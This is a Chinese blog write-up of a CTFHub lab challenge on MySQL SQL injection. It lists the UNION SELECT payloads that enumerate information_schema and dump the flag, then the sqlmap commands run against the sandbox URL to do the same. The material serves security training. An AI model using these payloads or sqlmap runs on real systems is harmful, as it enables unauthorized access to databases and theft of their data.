CTFHUB技能树之SQL——MySQL结构

南暮思鸢2024-10-20 19:30

开启靶场，打开链接：

先判断一下是哪种类型的SQL注入：

1 and 1=1#

正常回显

1 and 1=2#

回显错误，说明是整数型注入

判断一下字段数：

1 order by 2#

正常回显

1 order by 3#

回显错误，说明字段数是2列

知道字段数量为2后，可以查看数据库位置

1 union select 1,2#

没有发现数据，猜测数据可能不存在数据库中，修改注入语句

1 and 1=2 union select 1,2#或者-1 union select 1,2#都行

（1）查看数据库名

-1 union select 1,database()#

（2）查看全部数据库名

-1 union select 1,group_concat(schema_name)from information_schema.schemata#

可以发现sqli不是自带的数据库

（3）查看表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#

（4）查看列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='ufnanbfswh'#

（5）查看字段内容（flag）

-1 union select 1,group_concat(cqnstcfhov) from sqli.ufnanbfswh#

ctfhub{3f3b08fb458cc15178c70beb}

接下来用sqlmap一把梭：

（1）查看数据库名

python sqlmap.py -u "http://challenge-e23ec2503ef3e30f.sandbox.ctfhub.com:10800/?id=1" -dbs

（2）查看表名

python sqlmap.py -u "http://challenge-e23ec2503ef3e30f.sandbox.ctfhub.com:10800/?id=1" -D sqli -tables

（3）查看列名

python sqlmap.py -u "http://challenge-e23ec2503ef3e30f.sandbox.ctfhub.com:10800/?id=1" -D sqli -T ufnanbfswh -columns

（4）查看字段内容（flag）

python sqlmap.py -u "http://challenge-e23ec2503ef3e30f.sandbox.ctfhub.com:10800/?id=1" -D sqli -T ufnanbfswh -C cqnstcfhov -dump

或者得知数据库名和表名的情况下直接梭出字段内容：

python sqlmap.py -u "http://challenge-e23ec2503ef3e30f.sandbox.ctfhub.com:10800/?id=1" -D sqli -T ufnanbfswh --dump

要是时间够的话得知数据库名的情况下，直接一把梭：

python sqlmap.py -u "http://challenge-e23ec2503ef3e30f.sandbox.ctfhub.com:10800/?id=1" -D sqli --dump

上一篇：系统架构设计师教程第18章 18.6 数据库系统的安全设计笔记

下一篇：MySQL 【日期】函数大全（六）

热门推荐

01Coze扣子平台完整体验和实践（附国内和国际版对比）02KGG转MP3工具|非KGM文件|解密音频 03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04【无人机】无人机通信模块，无人机图数传模块的介绍，数传，图传，图传数传一体电台，05从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑 06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高，一键全文降！文件格式不变，公式都保留的！07神经网络架构KAN确实具有一些独特的特点及底层原理和应用场景 08DeepSeek各版本说明与优缺点分析 09VMware虚拟机安装Win7专业版保姆级教程（附镜像包）10海康视觉算法平台VisionMaster 4.3.0 C# 二次开发01 加载方案并获取结果